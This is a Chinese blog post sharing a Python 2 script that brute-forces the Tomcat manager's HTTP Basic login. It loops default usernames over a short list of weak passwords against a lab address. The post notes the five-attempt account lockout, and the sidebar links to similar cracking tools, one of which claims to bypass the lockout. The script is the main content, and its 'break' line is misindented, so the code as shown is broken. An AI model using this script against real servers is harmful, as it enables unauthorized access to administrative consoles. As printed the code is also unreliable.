Tomcat口令猜解工具【Python脚本】

最新推荐文章于 2020-12-21 19:25:39 发布
最新推荐文章于 2020-12-21 19:25:39 发布
阅读量528 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/81256059
版权

Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令。

测试环境:Tomcat版本 7.0

登录界面采用basic认证,Base 64加密一下,模拟浏览器进行发包

据测试,每个用户名输入5次错误的密码会锁定用户,想了一些办法,还是没能绕过,这里做个记录,有时间再完善。

目前只能用于简单的弱口令测试

Python脚本如下:

import urllib
import urllib2
import time
import base64 

names=['admin','tomcat']
passwds=['','admin','tomcat','123456','root']
for name in names: 
    name=name.rstrip()
    for passwd in passwds:  
        passwd=passwd.rstrip()
        user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)"  
        Authorization = "Basic %s" % (base64.b64encode(name+':'+passwd))
        header = { 'User-Agent' : user_agent , 'Authorization':Authorization}  

        try:        
            url = "http://192.168.106.137:8080/manager/html"
            request = urllib2.Request(url,headers=header)
            response = urllib2.urlopen(request,timeout=5)
            result=response.read()


            if response.code ==200:
                print '[Success] '  + url+' '+name+':'+passwd 
          break
                
                
        except: 
            print '[false111] '  + url+' '+name+':'+passwd 
            time.sleep(1)

 

Bypass--
关注
tomcat口令爆破脚本
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
03-19 385
【代码】tomcat口令爆破脚本
【愚公系列】2023年05月 Web渗透测试之Tomcat AJP协议攻击
热门推荐
时光隧道
08-25 5万+
Tomcat AJP协议攻击是一种利用Tomcat应用服务器中的AJP(Apache JServ 协议)协议漏洞或存在弱口令等安全问题的攻击方式。攻击者通过AJP协议访问Tomcat应用服务器的服务端口,从而获得未授权的对应用程序的访问权限。攻击者可以利用该漏洞实施远程代码执行攻击、敏感信息泄露等多种攻击手段。为有效遏制此类攻击,应当及时修复漏洞,并加强对应用程序的访问控制。
Python写的TOMCAT口令猜解工具
chuancuili8770的博客
01-15 158
#!/usr/bin/env python # -*- coding: utf-8 -*- # Functions: Idenfy tomcat password # Code By BlAck.Eagle import threading, time, random, sys, u...
tomcat后台密码爆破脚本(python+字典)_Web中间件漏洞之Tomcat
weixin_39806288的博客
11-21 1008
1Tomcat简介Tomcat 服务器是一个免费的开放源代码的 Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试 JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好 Apache 服务器,可利用它响应 HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上 Tomcat 是 Apache 服务器的扩展,但运...
burpsuite字典_Python攻防之弱口令、自定义字典生成及网站防护
weixin_39961855的博客
11-21 1715
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python网络攻防基础知识、Python多线程、C段扫描和数据库编程,本文将分享Python攻防之自定义字典生成,调用Python的exrex库实现。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前...
python实现监控增量_Python的一个增量读分析日志的脚本
weixin_39578197的博客
12-19 200
#!/usr/bin/envpython#coding:utf-8#guoiang.hanimporttime,datetimeimportsysimportos.pathimportreimportsmtplibfromemail.mime.textimportMIMEText#定义日志的日期名称date=time.strftime('%F')#定义要过滤的日志名字l...
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
tomcat暴破图形化---绕过tomcat 6/7/8的防暴破机制
12-19
tomcat 6/7/8 自带防暴力破解机制,通过塞满cache,挤出已锁定账号,实现完美绕过。
网站后台密码猜解工具
02-19
网站后台密码猜解工具.zip
通用网站后台密码猜解工具
03-23
通用网站后台密码猜解工具,通用网站后台密码猜解工具,通用网站后台密码猜解工具
超级弱口令暴力破解检查工具V1.0 Beta2\11\17全3个版本打包
01-16
超级弱口令暴力破解工具 可以检测常见端口服务(ssh、3389、tomcat、weblogic等)弱口令,功能很强大。
漏洞解决方案-图形验证码
smart的博客
08-10 5957
漏洞解决方案-图形验证码前置知识修复方案代码参考 前置知识 图形验证码是验证码的一种。验证码(CAPTCHA)是“Completely Automated Public Turing test to tell Computers and Humans Apart”(全自动区分计算机和人类的图灵测试)的缩写,是一种区分用户是计算机还是人的公共全自动程序。可以防止:恶意破解密码、刷票、论坛灌水等,有效防止某个黑客对某一个特定注册用户用特定程序暴力破解、枚举、重放等方式进行不断的操作或枚举猜解。 威胁描述: 图
复现 Tomcat口令爆破
XZ_______的博客
12-21 679
实验环境:一台配置好tomcat的windows server 2003靶机 一台装有burpsuit的攻击主机 实验前提:能够进入到靶机的tomcat主页 实验步骤: 打开靶机中的tomcat 然后进入到靶机的tomcat主页 打开burpsuit抓包工具进行抓包 打开代理进行抓包,这里的登录界面需要放一次包然后抓下一个包 点击这里会抓到一个包,将这个包放掉 然后会出现登录界面 配置好账号和密码,抓取当前页面的包(这里我们配置的账号为123,密码也为123) 我们会发现这里有一串疑似base
python 写的http后台弱口令爆破工具
weixin_30379911的博客
08-05 245
今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 4...
使用python3对tomcat后台爆破
qq_35492650的博客
10-28 975
通过分析 import requests import base64 url = "http://127.0.0.1:8080/manager/html" with open("dict.txt", "r") as f: while 1: passwd = f.readline()[:-1] if passwd == "": bre...
写一个安装tomcatPython脚本
最新发布
05-14
好的,以下是一个安装TomcatPython脚本示例: ```python import os import urllib.request import tarfile # 定义Tomcat版本号和下载链接 TOMCAT_VERSION = "9.0.44" TOMCAT_DOWNLOAD_URL = f...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值